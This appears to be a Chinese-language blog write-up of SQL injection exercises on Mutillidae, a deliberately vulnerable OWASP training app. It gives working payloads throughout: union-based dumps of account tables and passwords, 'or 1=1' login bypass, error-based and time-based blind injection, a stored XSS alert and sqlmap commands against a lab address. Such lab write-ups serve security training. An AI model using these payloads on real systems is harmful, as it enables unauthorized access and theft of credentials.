Mutillidae-OWASP2017

原创已于 2022-03-18 21:38:16 修改 · 5.1k 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#sql #数据库 #database

于 2022-03-15 17:15:19 首次发布

网络安全同时被 3 个专栏收录

51 篇文章

订阅专栏

渗透测试

40 篇文章

订阅专栏

WEB安全

32 篇文章

订阅专栏

本文详细探讨了SQL注入的攻击手段，包括判断注入点、利用'报错'和#注释、万能密码、列数判断、暴库表字段内容等高级技巧。同时，介绍了如何借助HackBar绕过验证，以及针对不同场景的防御策略，如禁用javascript和编码绕过。深入剖析了SQLI插入注入实例，并涵盖了前端开发、后端安全、数据库操作等多个关键领域。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

SQL注入

提取数据

判断注入点闭合字符及注释符

使用'报错

使用#注释

万能密码

判断列数

1' order by 7 #

判断结果为7列

求显示位

1' union select 1,2,3,4,5,6,7 #

暴库

1' union select 1,2,3,database(),5,6,7 #

暴表

1' union select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables where table_schema='mutillidae' #
信息：Signature=accounts,blogs_table,captured_data,credit_cards,help_texts,hitlog,level_1_help_include_files,page_help,page_hints,pen_test_tools,user_poll_results,youtubevideos

暴字段

1' union select 1,2,3,group_concat(column_name),5,6,7 from information_schema.columns where table_schema='mutillidae' and table_name='accounts' #
信息：cid,firstname,is_admin,lastname,mysignature,password,username

暴内容

1' union select 1,2,3,group_concat(cid,'~',firstname,'~',is_admin,'~',lastname,'~',mysignature,'~',password,'~',username),5,6,7 from mutillidae.accounts #

中级难度

使用HackBar

1' or 1=1 --+

绕过身份验证

使用万能密码即可绕过

admin' or 1=1 #

中级

使用HackBar

SQLI插入注入

这里有一个存储型的xss

<script>alert(/xss/)</script>

Insert型注入判断闭合字符和注释符

1‘ and ’1‘='1
1' || '

使用报错函数注入暴库

1' and updatexml(1,concat('`',database()),1) and'1'='1

暴表

1' and updatexml(1,concat('`',(select group_concat(table_name)from information_schema.tables where table_schema='mutillidae')),1) and'1'='1

中级

首先看弹窗信息

Single-quotes are not allowed. Dont listen to security people. Everyone knows if we just filter dangerous characters, injection is not possible.

We use JavaScript defenses combined with filtering technology.

Both are such great defenses that you are stopped in your tracks.

使用JavaScript防御与过滤技术

所以这里禁用javascript就可以了

SQLI插入注入2

使用和上面同样的payload即可

中级

在这里提交相同的payload即可

SQLI插入注入3

这里是Referer头部注入

在Referer加一个'运行后发现能正常执行且'被编码成了%27

使用burp抓包

在Referer头部构造payload

中级可以用同样的方法

SQL实践1

使用burp抓包截取post字段

sqlmap -u "http://192.168.5.228/mutillidae/index.php?page=login.php" --data "username=admin&password=password&login-php-submit-button=Login" --banner

SQL实践2

使用burp抓包

将数据包放在sqlmap上跑，在cookie处添加*

SQL实践3

与2相同，都是在cookie处

通过Javascript对象表示法

使用hackbar获取post表单

添加‘后报错，判断这里有注入点

使用and’1‘=’1闭合

这里可使用延时注入

判断长度

1' and if((length(database())=10),sleep(5),1) and'1'='1

猜解库名

猜解表名

1' and if((left((select group_concat(table_name)from information_schema.tables where table_schema="mutillidae"),1)='a'),sleep(5),1) and'1'='1

也可以使用报错函数进行注入，这里不再演示

中级

同样的注入点和payload，不再过多演示

Mutillidae-OWASP2017

SQL注入

提取数据

判断注入点闭合字符及注释符

万能密码

判断列数

求显示位

暴库

暴表

暴字段

暴内容

中级难度

绕过身份验证

使用万能密码即可绕过

中级

SQLI插入注入

这里有一个存储型的xss

Insert型注入 判断闭合字符和注释符

使用报错函数注入 暴库

暴表

中级

SQLI插入注入2

中级

SQLI插入注入3

SQL实践1

SQL实践2

SQL实践3

通过Javascript对象表示法

中级

Insert型注入判断闭合字符和注释符

使用报错函数注入暴库